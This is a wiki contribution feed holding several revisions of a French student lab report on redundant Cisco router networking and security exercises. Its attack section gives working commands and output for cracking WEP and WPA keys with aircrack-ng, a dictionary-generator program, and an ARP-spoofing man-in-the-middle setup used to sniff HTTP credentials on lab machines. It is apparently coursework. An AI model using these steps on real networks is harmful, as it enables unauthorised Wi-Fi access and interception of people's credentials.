https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&feedformat=atom&user=TvittecoWiki d'activités IMA - Contributions de l’utilisateur [fr]2026-05-14T05:28:20ZContributions de l’utilisateurMediaWiki 1.29.2https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=54310TP sysres IMA2a5 2020/2021 G62020-12-06T17:34:52Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
pastabox.site[http://193.48.57.169]<br />
<br />
__TOC__<br />
=Partie commune=<br />
<br />
==Installation du 6509==<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vus hardwares.<br />
<br />
On a donc dû installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées-sorties.<br />
<br />
== configuration 3560E ==<br />
La configuration du 3560E se fait via un port série et minicom.<br />
<br />
Elle consiste à se connecter au Vlan 130 afin d'avoir un accès au réseau Polytech ainsi qu'à Internet, et de créer 11 Vlan.<br />
Les Vlans :<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture.<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 à 11 seront distribués entre les personnes pour créer des réseaux locaux individuels.<br />
<br />
Les interfaces :<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
==Configuration de la redondance==<br />
<br />
Pour assurer la redondance des routeurs, on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant à l'interconnexion avec Internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
==Routeur virtuel==<br />
<br />
Les différentes machines virtuelles présentent sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresse du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utilisé le HSRP de façon a ce que les communications passent en priorité sur le 6509 (si on ne fait pas cette manipulation, les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installé HSRP sur les routeurs et on a défini la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==routage VRRP==<br />
<br />
On utilise le protocole VRRP pour augmenter la sécurité du réseau. Ce protocole a pour but de remplacer le HSRP. Le 3560E n'étant pas compatible avec le protocole VRRP, nous avons dû le remplacer par un autre routeur : le Catalyst 9200 24. Il faut donc transférer toute la configuration du 3560 vers le 9200. Dans un souci de fonctionnement, Mr REDON a déjà configuré le 9200 en routeur et le 3560 est utilisé en mode commutateur. Il nous reste donc à reconfigurer les vlan et les ports du 9200 pour pouvoir se passer du 3560E.<br />
Une fois cela fait, on installe le protocole VRRP sur les routeurs et on configure les mêmes priorités que le protocole HSRP, puisqu'e le vrrp a pour but de le remplacer.<br />
<br />
==Interconnexion avec internet==<br />
Nous n'avons pas eu le temps de réaliser cette partie en pratique.<br />
<br />
L'ISR doit permettre une redondance au niveau du fournisseur d'accès internet. Dans le cas ou renater ne serais plus capable d'assurer un accès à Internet, la connexion doit passer par l'ISR qui est relier à internet via un autre fournisseur d'accès.<br />
<br />
Il faut donc configurer l'isr avec le protocole VRRP en lui donnant une priorité faible (par exemple 80). De cette façon, il se placera en troisième position derrière le 6509 et le 9200. Ensuite, il faut configurer le protocole SLA sur le 6509 et le 9200 pour que ces routeurs vérifient que la connexion à Internet est fonctionnel. Dans le cas ou la connections ne serais pas fonctionnel, leurs priorités VRRP devrai baisser en dessus de la priorité de l'ISR de façon a ce que tout le flux de données passe par l'ISR. Une fois la connections rétablie entre les routeurs principaux et renater, ils reprennent leurs priorités de base et l'ISR se place en routeur de secours.<br />
<br />
=Installation des VM=<br />
<br />
Les VM sont installées sur le serveur capBreton. Elles sont reliées aux deux routeurs du réseau via un routeur virtuel. Elles sont présentes sur le Vlan 2 et elles possèdent toutes des adresses IP routable, ce qui permet, a n'importe quel appareil connecté à Internet, de se connecter en ssh à ces derniers.<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
On utilise airmon pour configurer la clef wifi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le réseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
Ensuite, on liste tous les paquets qui passent avec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel où se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on décode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
On effectue la même procédure que pour la clef wep. Pour le décodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va génerer tous les mots de passes possibles qui sont sous la forme de 8 chiffres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
Si besoin, pour accélérer le traitement, on peut partager la charge de travail sur plusieurs pc. Pour ce faire, on utilise la commande split pour séparer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transférer les fichiers, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mots de passe présents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93<br />
<br />
<br />
==attaque par homme du millieu==<br />
<br />
Cette attaque consiste à se faire passer pour le routeur et ainsi modifier les données qui transitent<br />
<br />
Pour ce faire, il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : <br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
car ce fichier est un fichier spécifique et il ne peut pas être modifié avec des commandes classiques<br />
<br />
On modifie aussi les fichiers :<br />
echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter<br />
echo 0 > /proc/sys/net/ipv4/conf/default/rp_filter<br />
<br />
On fait ensuite un ip r pour récupérer l'adresse ip du routeur et on envoie des réponses arp a notre cible avec la commande suivante :<br />
arpspoof -i bridge -t zabeth06 172.26.145.254<br />
<br />
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'adresse du routeur.<br />
<br />
Le pc cible va recevoir des reponses arp et va changer ca table d'adressage en considérant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requêtes à ce dernier.<br />
<br />
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : </code>host zabeth06 and port http</code>. On vois alors toutes les connections de zabeth06 vers des sites http.<br />
<br />
En se connectant sur un site en http et donc non sécurisé, on peut visualiser l'ensemble des communications entre l'ordinateur attaqué et les sites http comme les mots de passe<br />
<br />
Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n<br />
Non d'utilisateur : Oui le pas de calais<br />
Mdp : le mdp<br />
<br />
<br />
==Sécurisation des données pas chifrement==<br />
<br />
Pour crypter les données d'une clef USB, on a besoin de deux packages : lvm2 et cryptsetup.<br />
<br />
Une fois cela fait, on supprime les différentes partissions de la clef USB via la commande :<br />
fdisk [emplacement de la clef usb]<br />
<br />
On lance ensuite la commande cryptsetup:<br />
cryptsetup -y -v luks [emplacement de la clef usb]<br />
<br />
Puis en renseigne le mot de passe a utiliser.<br />
Désormais, pour utiliser la clef USB, il faudra entrer le mot de passe définie.<br />
<br />
=instalation dns securisé=<br />
<br />
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53970TP sysres IMA2a5 2020/2021 G62020-11-20T11:38:36Z<p>Tvitteco : /* Partie commune */</p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
pastabox.site[http://193.48.57.169]<br />
<br />
__TOC__<br />
=Partie commune=<br />
<br />
==Installation du 6509==<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
== configuration 3560E ==<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
==Configuration de la redondance==<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
==Routeur virtuel==<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==routage VRRP==<br />
<br />
on utilise le protocol VRRP pour augmenter la sécurité du réseau. Ce protocol a pour but de remplacer le HSRP. Le 3560E n'etant pas compaible avec le protocol VRRP, nous avons dus utiliser le remplacer par un autre routeur:le Catalyst 9200 24. Il faut donc transferet toute la configuration du 3560 vers le 9200. Dans un soucis de fonctionement, Mr REDON a déja configurer le 9200 en routeur et le 3560 est utiliser en mode comutateur. Il ne nous reste donc a reconfigurer les vlan et les ports du 9200 pour pouvoir ce passer du 3560E.<br />
Une fois cela fait, on installe le protocol VRRP sur les routeurs et on configure les memes prioritées que le protocol HSRP, puisqu'e le vrrp a pour but de le remplacer.<br />
<br />
==Interconnexion avec internet==<br />
Nous n'avons pas eu le tmeps de realiser cette partie en pratique.<br />
<br />
L'ISR doit permetre une redondance au niveau du fournusseur d'acces internet. Dans le cas ou renatere ne serais plus capable d'assurer un acces a internet, la connexion doit passer par l'isr qui eset relier a internet via un autre fournisseur d'acces.<br />
Il faut donc configurer l'isr avec le protocol VRRP en lui donnant une priorité faible (par exemple 80). De cette facon, il se placera en troisieme position deriere le 6509 et le 9200. Ensuite, il faut configuerer le protocol SLA sur le 6509 et le 9200 pour que ces routeurs verifient que la connexion a in ternet est fonctionnel. Dans le cas ou la connextion ne serais pas fonctionnnel, leurs prorité VRRP devrai baisser en desous de la priorité de l'ISR de facon a ce que tout le flux de données passe par l'ISR. Une foie la connextion retabie entre les routeurs principaux et renater, ils reprennent leurs prioritées de base et l'ISR se place en routeur de secour.<br />
<br />
=Installation des VM=<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93<br />
<br />
<br />
==attaque par homme du millieu==<br />
<br />
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites<br />
<br />
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : <br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques<br />
<br />
On modifie aussi les fichiers :<br />
echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter<br />
echo 0 > /proc/sys/net/ipv4/conf/default/rp_filter<br />
<br />
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :<br />
arpspoof -i bridge -t zabeth06 172.26.145.254<br />
<br />
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.<br />
<br />
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.<br />
<br />
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : </code>host zabeth06 and port http</code>. On vois alors toutes les connections de zabeth06 vers des sites http.<br />
<br />
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes<br />
<br />
Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n<br />
Non d'utilisateur : Oui le pas de calais<br />
Mdp : le mdp<br />
<br />
<br />
=instalation dns securisé=<br />
<br />
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53965TP sysres IMA2a5 2020/2021 G62020-11-20T11:13:33Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
pastabox.site[http://193.48.57.169]<br />
<br />
__TOC__<br />
=Partie commune=<br />
<br />
==Installation du 6509==<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
== configuration 3560E ==<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
==Configuration de la redondance==<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
==Routeur virtuel==<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
=Installation des VM=<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon<br />
<br />
Avec la commande aircrack on decode la clef wep<br />
<br />
<br />
Aircrack-ng 1.5.2 <br />
[00:00:00] Tested 665 keys (got 99549 IVs)<br />
KB depth byte(vote)<br />
0 0/ 50 F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) <br />
1 6/ 1 32(110848) 28(109568) B5(109568) 11(109312) 52(109056) <br />
2 0/ 2 A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) <br />
3 0/ 1 A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) <br />
4 0/ 1 A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) <br />
KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
<br />
==crackage Wpa==<br />
<br />
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :<br />
<br />
#include "stdio.h"<br />
#include "stdlib.h"<br />
int main(){<br />
int i=0;<br />
FILE* fichier=fopen("mdp","w+");<br />
for(i;i<=99999999;i++)<br />
{<br />
fprintf(fichier,"%08d\n",i);<br />
}<br />
fclose(fichier);<br />
}<br />
<br />
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:<br />
split -b 200000000 mdp<br />
<br />
Pour transferer les fichier, on utilise la commande :<br />
scp mdp zabethXX:mdp<br />
<br />
on effectue la commande :<br />
aircrack-ng logWpa-02.cap -w mdp<br />
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe<br />
<br />
Aircrack-ng 1.5.2 <br />
[01:03:39] 20208040/102795810 keys tested (4001.16 k/s) <br />
Time left: 5 hours, 44 minutes, 1 second 19.66%<br />
KEY FOUND! [ 20133333 ]<br />
Master Key : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 <br />
A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 <br />
Transient Key : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B <br />
B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 <br />
7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 <br />
E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E <br />
EAPOL HMAC : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93<br />
<br />
<br />
==attaque par homme du millieu==<br />
<br />
Cette attaque consiste a se faire passer pour le routeur et ainssi modifier les données qui transites<br />
<br />
pour ce faire il faut modifier le fichier /proc/sys/net/ipv4/ip_forward. On utilise la commande : <br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
car ce fichier est un fichier specifique et il ne peut pas etre modifié avec des commandes classiques<br />
<br />
On modifie aussi les fichiers :<br />
echo 0 > /proc/sys/net/ipv4/conf/all/rp_filter<br />
echo 0 > /proc/sys/net/ipv4/conf/default/rp_filter<br />
<br />
On fait ensuite un ip r pour recuperer l'addresse ip du routeur et on envoie des reponces arp a notre cible avec la commande suivante :<br />
arpspoof -i bridge -t zabeth06 172.26.145.254<br />
<br />
bridge est l'interface que l'on utilise, zabeth06 est la cible et 172.26.145.254 est l'addresse du routeur.<br />
<br />
Le pc cible va recevoir des reponces arp et va changer ca table d'addressage en conciderant l'ordinateur attaquant comme son routeur. Il va donc envoyer ces requettes a ce dernier.<br />
<br />
Sur le pc attaquant, on peut utiliser wireschark avec comme filtre : </code>host zabeth06 and port http</code>. On vois alors toutes les connections de zabeth06 vers des sites http.<br />
<br />
En se connectant sur un site en http et donc non securisé, on peut visualiser l'ensemble des des communications entre l'ordinateur attaqué et les sites http comme les mots de passes<br />
<br />
Authorization: Basic T3VpIGp1fdghtrGIUG46546\r\n<br />
Non d'utilisateur : Oui le pas de calais<br />
Mdp : le mdp<br />
<br />
<br />
=instalation dns securisé=<br />
<br />
[[Fichier:pastabox.site-2020-11-13-08_50_33-UTC.png]]</div>Tvittecohttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&diff=53964TP sysres IMA2a5 2020/2021 G62020-11-20T11:12:58Z<p>Tvitteco : </p>
<hr />
<div>Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité<br />
<br />
pastabox.site[http://193.48.57.169]<br />
<br />
__TOC__<br />
==Partie commune==<br />
<br />
===Installation du 6509===<br />
<br />
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.<br />
<br />
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.<br />
<br />
=== configuration 3560E ===<br />
La configuration du 3560E se fait via un port série et minicom<br />
<br />
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.<br />
Les Vlans:<br />
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture<br />
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel<br />
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels<br />
<br />
Les interfaces:<br />
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre<br />
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet<br />
<br />
===Configuration de la redondance===<br />
<br />
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.<br />
<br />
Pour l'ipv6, la gestion de la redondance a été faite en configurant "nd router-preference" a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.<br />
<br />
<br />
===Routeur virtuel===<br />
<br />
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.<br />
<br />
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.<br />
<br />
==Installation des VM==<br />
<br />
pastabox.site<br />
<br />
<br />
=Attaque=<br />
==crackage WEP==<br />
<br />
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent<br />
<br />
airmon-ng start wlx40a5ef0598a3<br />
<br />
On peut voir que le reseau a été renomé:<br />
<br />
root@zabeth07:~# airmon-ng<br />
PHY Interface Driver Chipset<br />
phy2 wlan0mon rt2800usb Ralink Technology, Corp. RT5370<br />
<br />
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte<br />
<br />
